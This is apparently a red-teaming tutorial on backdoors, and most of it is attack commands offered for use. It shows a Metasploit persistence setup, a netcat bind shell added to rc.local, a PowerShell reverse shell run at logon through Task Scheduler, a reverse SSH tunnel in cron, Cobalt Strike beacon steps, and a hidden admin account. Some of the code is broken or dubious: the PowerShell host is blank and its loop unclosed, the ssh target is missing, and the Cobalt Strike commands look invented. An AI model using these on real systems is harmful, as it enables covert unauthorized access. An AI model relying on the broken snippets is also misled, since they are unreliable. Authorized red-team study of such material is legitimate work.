Practical Guide to Backdoors in Red Teaming

Backdoors are tools or methods used by attackers to maintain persistent access to a compromised system. In a red teaming context, backdoors allow penetration testers to ensure they can return to a system even if the initial access vector is closed. Below, we'll explore practical techniques for implementing and using backdoors.

Creating a Persistent Meterpreter Session

Tool: Metasploit


  • Exploit a vulnerability to gain an initial foothold.

  • Migrate to a stable process to maintain the session.

  • Set up persistence with a Meterpreter script.

use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp

Once the session is established:

meterpreter > run persistence -U -i 5 -p 4444 -r

This command sets up a persistent Meterpreter backdoor that will start every time the user logs in.

Using Netcat for a Simple Backdoor

Tool: Netcat


  • Transfer Netcat to the target system.

  • Set up a persistent listener on the target system.


nc -lvp 4444 -e /bin/bash

To make it persistent, add the command to a startup script:

echo 'nc -lvp 4444 -e /bin/bash' >> /etc/rc.local

Using PowerShell for Windows Persistence

Tool: PowerShell


  • Create a PowerShell script to establish a reverse shell.

  • Use Task Scheduler to run the script at startup.


$client = New-Object System.Net.Sockets.TCPClient("", 4444)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i)
    $sendback = (iex $data 2>&1 | Out-String )
    $sendback2  = $sendback + "PS " + (pwd).Path + "> "
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
    $stream.Write($sendbyte, 0, $sendbyte.Length)

Save this script and schedule it using Task Scheduler:

schtasks /create /sc onlogon /tn "PowerShell Backdoor" /tr "powershell.exe -ExecutionPolicy Bypass -File C:\path\to\script.ps1"

Creating a Reverse SSH Tunnel

Tool: SSH


  • Set up a reverse SSH tunnel to maintain access.


ssh -R 9090:localhost:22

To make it persistent, add the command to cron:

(crontab -l ; echo "@reboot ssh -R 9090:localhost:22") | crontab -

Deploying Custom Backdoor with C2 Framework

Tool: Cobalt Strike


  • Use Cobalt Strike to create a custom beacon.

  • Deploy the beacon on the target system and set it to call back periodically.


./teamserver <external IP> <password>
> spawnb

In Cobalt Strike:

beacon> run persistence -script windows/beacon.exe -args 4444

Hidden User Accounts: Creating hidden user accounts with elevated privileges.

Example: Creating a Hidden Admin User on Windows:

net user hiddenadmin P@ssw0rd /add
net localgroup administrators hiddenadmin /add

Impact: The hidden user account provides the attacker with administrative access.

Some useful Backdoor references:

Understanding and effectively implementing persistence and backdoor techniques are critical for simulating advanced attack scenarios in red teaming engagements. While common backdoors are increasingly detected by EDRs, some methods can still circumvent these defenses by using advanced Red Teaming techniques that we cover in our live Red Teaming workshops.

Last updated